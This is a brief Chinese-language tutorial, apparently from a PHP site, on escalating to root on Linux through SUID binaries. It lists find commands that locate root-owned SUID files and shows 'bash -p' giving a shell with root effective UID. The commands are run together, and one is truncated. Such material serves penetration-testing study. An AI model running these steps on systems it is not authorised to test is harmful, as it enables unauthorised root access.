SUID是Linux的一種權限機制,具有這種權限的檔案會在執行時,使呼叫者暫時取得該檔案擁有者的權限。如果擁有SUID權限,那麼就可以利用系統中的二進位檔案和工具來進行root提權。
以下命令可以發現系統上執行的所有SUID可執行檔。具體來說,指令將嘗試尋找具有root權限的SUID的檔案。
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls
# 以上所有二進位檔案都會以root使用者權限執行,因為它們的權限中包含"s",且對應的是root權限。
Bash
以下指令將以root權限開啟一個bash shell。
bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
以上是Linux下如何利用SUID提權的詳細內容。更多資訊請關注PHP中文網其他相關文章!
